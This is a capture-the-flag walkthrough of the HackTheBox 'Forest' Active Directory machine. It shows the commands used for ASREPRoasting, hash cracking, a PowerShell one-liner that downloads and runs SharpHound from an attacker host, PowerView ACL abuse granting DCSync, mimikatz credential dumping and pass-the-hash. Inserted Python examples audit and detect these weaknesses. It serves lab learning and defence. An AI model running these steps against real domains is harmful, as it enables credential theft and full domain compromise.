
Forest

Adopt the pace of nature!

Forest is an easy difficulty Windows machine. It tests your knowledge of basic enumeration and privilege escalation using common commands, as well as tools such as Bloodhound.

Be sure to check out the Basic Setup section before you get started.

Enumeration

Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.

Portscan

portscan forest.htb
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-07 14:53 GMT
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.37s latency).
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-11-07 07:00:32Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49695/tcp open  msrpc        Microsoft Windows RPC
49714/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -5h13m08s, deviation: 4h37m12s, median: -7h53m11s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2019-11-06T23:03:07-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2019-11-07T07:03:05
|_  start_date: 2019-11-07T06:39:53

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 300.76 seconds

From our scan we can see a few things of interest. SMB, Kerberos and WinRM (port 5985) are all exposed, and each can be useful in gaining access.

Enum4Linux

Let’s see if we can grab any useful info:

enum4linux forest.htb > enum4linux.txt

We can then check to see if we have found any users:

cat enum4linux.txt | grep -i users
.... SNIP ....
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\Administrator
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\krbtgt
.... SNIP ....
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\sebastien
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\lucinda
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\andy
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\mark
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\santi

Looks like we have found a few… Nice! Let’s make a list of just the usernames, with all the other junk stripped out, and save it as usernames.txt.

User

We have usernames but no passwords, so let’s see if any of the accounts are configured so that Kerberos pre-authentication is not required. This is called ASREPRoasting, and we will use one of Impacket’s examples for it:

GetNPUsers.py -dc-ip 10.10.10.161 htb.local/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast

Checking our output file we see that we have grabbed a hash:

cat hashes.asreproast
$krb5asrep$23$svc-alfresco@HTB.LOCAL:d36a3e9c1a66....fedc13432f1$981ae7bbc66fa7e5b60ef5cbd49a1c66709cf03165607db827c1af40deae1f2d8470aac43a2269072020340bdbd2e1e8752ee190cc3ef007aa8db1a0e4ad5871bf80f874b6add353ed0c87950c9e5ed2b3b9d9bb4a41862cc417f24ef109cd97d1fd79c2c4cea7751bd674d60bc772d319ffac306c07c788bac33bba6021acd61ed849e0dcee....a58d61b36ffdf5c1127bb1c115b53c48071328d9bcd5cc9bf0dd021e56ff3fa2aa4e98a113b465982a127d60fa4960c0d38d7b6e45975f95fbd45ccf....84f1ea0bf47473f8e3aac56518fc263c7407d67fb6bea4074b98c

Let’s try and crack the hash:

hashcat -m 18200 --force -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6800K CPU @ 3.40GHz, 2048/5918 MB allocatable, 4MCU

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 6 secs

$krb5asrep$23$svc-alfresco@HTB.LOCAL:c32a238add6ade578c169b14a26203f5$49f40b19377f04ea05fc9474c79e3e0242685fb533b0e2c7ad6e41b688221def0bcbf0caa7e588c01e01132495dd8bc9ec3f5c3afba95bc891f64e18fcb666831f23a0bf2aff1860e36f1c06588ac89182b37980938d9b97a3876b7096434de2f08bc7b8885e974d5f6529dc9e0ffd174a6b23460d0e5c76ba2c2613506c1be1fbbf678464980af717d9fe576fe77310ff97442eb205e18a380b539199658b40246634714bad41808ff2e6542ac86a5e64b94073c1f4b40d83d6fe6d84dab9ecfed80a14301c935276f16db4d35f83f264a460450ab1d248e34bbc7d7904883ce4fd505d1ec0:s3....ce

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:c32a238add6ade...5d1ec0
Time.Started.....: Sun Nov 10 13:54:23 2019 (8 secs)
Time.Estimated...: Sun Nov 10 13:54:31 2019 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 543.7 kH/s (6.04ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4087808/14344385 (28.50%)
Rejected.........: 0/4087808 (0.00%)
Restore.Point....: 4079616/14344385 (28.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: s9039554h -> s2704081
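The weakness behind this step is a single account flag. As an added example (my code, not part of the original writeup or of Impacket), the script below does the defender-side version of the check: it walks a set of constructed LDAP-style account records and lists the enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set, and it splits a hashcat mode 18200 line into its labelled fields so an incident responder who finds such a file can see at a glance which principal and realm it belongs to. The account records and the sample hash line are constructed; the 0x400000 and 0x2 flag values are the documented userAccountControl bits.

```python
# Added example (not from the original writeup): audit for accounts that are
# ASREPRoastable, plus a parser for the hashcat 18200 line format.

# Documented userAccountControl bits
DONT_REQ_PREAUTH = 0x400000   # "Do not require Kerberos preauthentication"
ACCOUNTDISABLE   = 0x000002   # account is disabled
NORMAL_ACCOUNT   = 0x000200   # ordinary user object

# Constructed sample records in the shape an LDAP export would give us.
# The values are made up for the example, not data from the box.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "svc-alfresco",  "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "oldsvc",        "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE},
    {"sAMAccountName": "lucinda",       "userAccountControl": NORMAL_ACCOUNT},
]

# Constructed hash line: real checksum/enc-data replaced with filler bytes.
SAMPLE_ASREP = "$krb5asrep$23$svc-alfresco@HTB.LOCAL:" + "00" * 16 + "$" + "ab" * 40


def asrep_roastable(accounts):
    """Return the sorted names of *enabled* accounts with pre-auth disabled.

    Disabled accounts are skipped: the KDC will not issue an AS-REP for them,
    so they are not exposed, although the flag should still be cleaned up.
    """
    found = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            found.append(acct["sAMAccountName"])
    return sorted(found)


def parse_asrep_hash(line):
    """Split a hashcat mode 18200 line into its fields.

    Layout: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<enc-data>
    etype 23 is RC4-HMAC, which is why the hash keys straight off the
    account's NT hash and cracks at dictionary speed.
    """
    if not line.startswith("$krb5asrep$"):
        raise ValueError("not a hashcat 18200 AS-REP line")
    _, _, etype, principal_and_checksum, enc_data = line.split("$", 4)
    principal, checksum = principal_and_checksum.split(":", 1)
    user, realm = principal.rsplit("@", 1)
    return {
        "etype": int(etype),
        "user": user,
        "realm": realm,
        "checksum": checksum,
        "enc_data_len": len(enc_data) // 2,   # hex chars -> bytes
    }


if __name__ == "__main__":
    for name in asrep_roastable(SAMPLE_ACCOUNTS):
        print(f"pre-auth disabled on enabled account: {name}")
    print(parse_asrep_hash(SAMPLE_ASREP))
```

The remediation for anything the first function lists is to clear the flag (in AD Users and Computers it is the "Do not require Kerberos preauthentication" checkbox) and rotate the password, since the account's NT hash has been exposed to offline guessing for as long as the flag was set.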

We have valid credentials! Let’s see if we can log in via WinRM:

PS htb\svc-alfresco@FOREST Documents> cat ../Desktop/user.txt
e5e4e47ae7....013fb0d9ed

We have the user.txt flag. Let’s move on to root!

Root

Taking a look at the groups our user belongs to, we see a couple of interest:

PS htb\svc-alfresco@FOREST Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                  Type  SID                                           Attributes
=========================== ===== ============================================= ==================================================
.... SNIP ....
HTB\Privileged IT Accounts  Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts        Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group

To find a path to Domain Admin we will use Bloodhound.

We collect the data we need with SharpHound:

PS htb\svc-alfresco@FOREST Documents> powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://<attacker-ip>/SharpHound.ps1');Invoke-BloodHound -CollectionMethod All -SearchForest -Domain HTB.LOCAL -DomainController FOREST.HTB.LOCAL -LDAPUser svc-alfresco -LDAPPass s3....ce -ZipFileName bloodhound.zip -Verbose"
Initializing BloodHound at 7:49 AM on 3/21/2020
Manually specifying a domain controller will likely result in data loss. Only use this for performance/opsec reasons
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for HTB.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for htb.local : FOREST.htb.local
EXCH01.HTB.LOCAL did not respond to ping
Status: 123 objects enumerated (+123 61.5/s --- Using 148 MB RAM)
Finished enumeration for HTB.LOCAL in 00:00:02.6399943
1 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish
Compressing data to C:\Users\svc-alfresco\Documents\bloodhound.zip.
You can upload this file directly to the UI.
Finished compressing files!

We can then download bloodhound.zip and load it into Bloodhound by selecting Upload Data from the vertical menu on the right-hand side.

On the left side we see Database Info; to the right of that we click on Queries, then select Find Shortest Paths to Domain Admins.

This gives us a nice overview of the path we need to take:

As expected, the path moves through the groups we saw earlier until we find that we are also in the Account Operators group, which has GenericAll permissions. We also see the Exchange Windows Permissions group, which would give us WriteDacl privileges.
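What Bloodhound is doing here is expanding nested group membership: svc-alfresco is never added to Account Operators directly, but ends up there through Service Accounts and Privileged IT Accounts. As an added example (my code, not part of the original writeup or of Bloodhound), the script below does that expansion over a constructed group map so a defender can list which ordinary users effectively belong to a high-value group, and print the chain that gets them there. The group map and the HIGH_VALUE set are constructed to mirror the chain this writeup describes, not data exported from the box.

```python
# Added example (not from the original writeup): expand nested AD group
# membership and report which users effectively sit in high-value groups.
from collections import deque

# Constructed: group -> direct members (users or other groups). Mirrors the
# nesting this writeup describes, but is made up for the example.
SAMPLE_GROUPS = {
    "Service Accounts":             ["svc-alfresco"],
    "Privileged IT Accounts":       ["Service Accounts"],
    "Account Operators":            ["Privileged IT Accounts"],
    "Exchange Windows Permissions": [],
    "Domain Admins":                ["Administrator"],
    "Remote Management Users":      ["svc-alfresco"],
}

# Groups whose effective membership a reviewer should read line by line.
HIGH_VALUE = {"Account Operators", "Exchange Windows Permissions", "Domain Admins"}


def effective_members(groups, group):
    """Return the set of non-group principals that are members of `group`
    directly or through any depth of nesting. Cycle-safe."""
    seen, users = set(), set()
    queue = deque([group])
    while queue:
        g = queue.popleft()
        if g in seen:
            continue
        seen.add(g)
        for member in groups.get(g, []):
            if member in groups:        # nested group: keep walking
                queue.append(member)
            else:                       # leaf principal (user/computer)
                users.add(member)
    return users


def membership_path(groups, user, target):
    """Return the chain [user, group, ..., target] that makes `user` an
    effective member of `target`, or None if there is no such chain."""
    parent = {target: None}             # group -> the group that contains it
    queue = deque([target])
    while queue:
        g = queue.popleft()
        for member in groups.get(g, []):
            if member == user:
                path = [user, g]
                while parent[path[-1]] is not None:
                    path.append(parent[path[-1]])
                return path
            if member in groups and member not in parent:
                parent[member] = g
                queue.append(member)
    return None


def high_value_exposure(groups, high_value=HIGH_VALUE):
    """Map each high-value group to the sorted list of users who reach it."""
    return {g: sorted(effective_members(groups, g)) for g in high_value if g in groups}


if __name__ == "__main__":
    for group, users in sorted(high_value_exposure(SAMPLE_GROUPS).items()):
        print(f"{group}: {users}")
        for u in users:
            print("   via " + " -> ".join(membership_path(SAMPLE_GROUPS, u, group)))
```

A review that only reads the direct member list of Account Operators would show a single nested group and miss the service account entirely; the effective list is what the shortest-path query visualises, and it is the list to reconcile against who is actually supposed to hold that privilege.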

If we hover over GenericAll we can right click and select Help:

From here we get literal instructions to add ourselves to the Domain Admins group with PowerView, which seems a little too hopeful. Downloading PowerView to the victim machine and trying this results in Permission Denied.

Using the Exchange Windows Permissions group instead we get some success:

PS htb\svc-alfresco@FOREST Documents> Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members 'svc-alfresco' -Verbose
Verbose: [Add-DomainGroupMember] Adding member 'svc-alfresco' to group 'Exchange Windows Permissions'

When we check with net user svc-alfresco we see that we have been added to the group. However, after some time the membership disappears, meaning the account is reset periodically to avoid spoilers.

So we will create another account and add that user to the Exchange Windows Permissions group instead:

PS htb\svc-alfresco@FOREST Documents> $SecPassword = ConvertTo-SecureString 's3....ce' -AsPlainText -Force
PS htb\svc-alfresco@FOREST Documents> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS htb\svc-alfresco@FOREST Documents> $UserPassword = ConvertTo-SecureString '<user-password>' -AsPlainText -Force
PS htb\svc-alfresco@FOREST Documents> New-DomainUser -SamAccountName sabe -AccountPassword $UserPassword -Credential $Cred -Verbose | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred -Verbose
Verbose: [Get-PrincipalContext] Using alternate credentials
Verbose: [Get-PrincipalContext] Using alternate credentials
Verbose: [New-DomainUser] Attempting to create user 'sabe'
Verbose: [New-DomainUser] User 'sabe' successfully created
Verbose: [Add-DomainGroupMember] Adding member 'CN=sabe,CN=Users,DC=htb,DC=local' to group 'Exchange Windows Permissions'

Oh, and we almost forgot! Add the new user to the Remote Management Users group so it can use WinRM:

PS htb\svc-alfresco@FOREST Documents> Add-DomainGroupMember -Identity 'Remote Management Users' -Members 'sabe' -Verbose
Verbose: [Add-DomainGroupMember] Adding member 'sabe' to group 'Remote Management Users'

Now let’s log in with our new user.

Going back to Bloodhound, if we hover over WriteDacl we can right click and select Help once again:

Again we get instructions, this time on how to grant ourselves DCSync rights, which should allow us to extract the Domain Administrator’s hash.

Let’s try doing this with the user we just created:

PS htb\seth@FOREST Documents> $SecPassword = ConvertTo-SecureString '<user-password>' -AsPlainText -Force
PS htb\seth@FOREST Documents> $Cred = New-Object System.Management.Automation.PSCredential('HTB\sabe', $SecPassword)
PS htb\seth@FOREST Documents> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "dc=htb,dc=local" -PrincipalIdentity sabe -Rights DCSync -Verbose

Now we can use mimikatz to extract the Administrator hash:

PS htb\sabe@FOREST Documents> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
User Principal Name  : Administrator@htb.local
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/18/2019 10:09:08 AM
Object Security ID   : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 32693b11e6....72a07ceea6
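The Add-DomainObjectAcl step and the DCSync pull above each leave a distinct trace, and both are worth checking for on the defensive side. As an added example (my code, not part of the original writeup, mimikatz or PowerView), the script below implements two checks over constructed data: a DACL review of the domain object that flags any principal outside the expected set holding the directory-replication extended rights, and a detection over Security log Event 4662 records that alerts when a principal other than a domain controller or a built-in admin group exercises those rights. The three GUIDs are the documented control-access rights DCSync relies on; the ACE list, the log lines and the EXPECTED_REPLICATORS set are constructed for htb.local and would need to be replaced with the real DC and admin principals in a live domain.

```python
# Added example (not from the original writeup): audit and detect the rights
# that make DCSync possible. All input data below is constructed.
import re

# Documented extended-right GUIDs needed to replicate directory secrets.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals that legitimately hold/use these rights. Constructed for
# htb.local; in a real domain, list the DCs and built-in admin groups.
EXPECTED_REPLICATORS = {
    "HTB\\FOREST$", "HTB\\Domain Controllers", "HTB\\Enterprise Domain Controllers",
    "HTB\\Administrators", "HTB\\Domain Admins", "HTB\\Enterprise Admins",
}

# Constructed ACEs in the shape of an ACL dump of dc=htb,dc=local.
SAMPLE_ACES = [
    {"principal": "HTB\\Domain Controllers", "object_type": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
    {"principal": "HTB\\Domain Controllers", "object_type": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
    {"principal": "HTB\\Administrators",     "object_type": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
    {"principal": "HTB\\sabe",               "object_type": "1131F6AA-9C07-11D1-F79F-00C04FC2DCD2"},
    {"principal": "HTB\\sabe",               "object_type": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
    {"principal": "HTB\\lucinda",            "object_type": "bf967a7f-0de6-11d0-a285-00aa003049e2"},
]

# Constructed Event 4662 records flattened to one "key=value" line each.
SAMPLE_4662 = [
    "EventID=4662 SubjectDomainName=HTB SubjectUserName=FOREST$ ObjectType=domainDNS "
    "ObjectName=DC=htb,DC=local Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectDomainName=HTB SubjectUserName=sabe ObjectType=domainDNS "
    "ObjectName=DC=htb,DC=local Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectDomainName=HTB SubjectUserName=lucinda ObjectType=user "
    "ObjectName=CN=mark,CN=Users,DC=htb,DC=local Properties={bf967a7f-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624 SubjectDomainName=HTB SubjectUserName=sabe LogonType=3",
]

# key=value, where a value is either a run of {guid} tokens or one token
FIELD_RE = re.compile(r"(\w+)=(\{[^}]*\}(?:\s*\{[^}]*\})*|\S+)")
GUID_RE = re.compile(r"\{([0-9a-fA-F-]+)\}")


def unexpected_replication_aces(aces, expected=EXPECTED_REPLICATORS):
    """Return sorted (principal, right) pairs for replication rights granted
    to anyone outside the expected set. This is the finding a DACL review
    of the domain object should raise."""
    hits = set()
    for ace in aces:
        right = REPL_RIGHTS.get(ace["object_type"].lower())
        if right and ace["principal"] not in expected:
            hits.add((ace["principal"], right))
    return sorted(hits)


def parse_event(line):
    """Turn a flattened key=value log line into a dict."""
    return dict(FIELD_RE.findall(line))


def detect_dcsync(lines, expected=EXPECTED_REPLICATORS):
    """Return (principal, [rights]) for every 4662 event in which a principal
    outside the expected set exercised a replication right."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS)
        if not rights:
            continue
        who = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}"
        if who not in expected:
            alerts.append((who, rights))
    return alerts


if __name__ == "__main__":
    print("DACL findings:", unexpected_replication_aces(SAMPLE_ACES))
    print("4662 alerts:  ", detect_dcsync(SAMPLE_4662))
```

Event 4662 is only written when the "Audit Directory Service Access" subcategory is enabled and the domain object has a SACL entry covering control access, so the detection is only as good as the audit policy on the DCs; the DACL review does not depend on logging and is the quicker of the two to run after an incident like this one.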

We can now log in using the NTLM hash:

evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6....72a07ceea6

Evil-WinRM shell v2.0

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
f048153f20....04d79129cc

Now that was an interesting one!

Conclusion

This box was really fun to do and fun to help people with as well. The concept was realistic, in the sense that misconfigurations like these can help an attacker gain unauthorized access to a machine.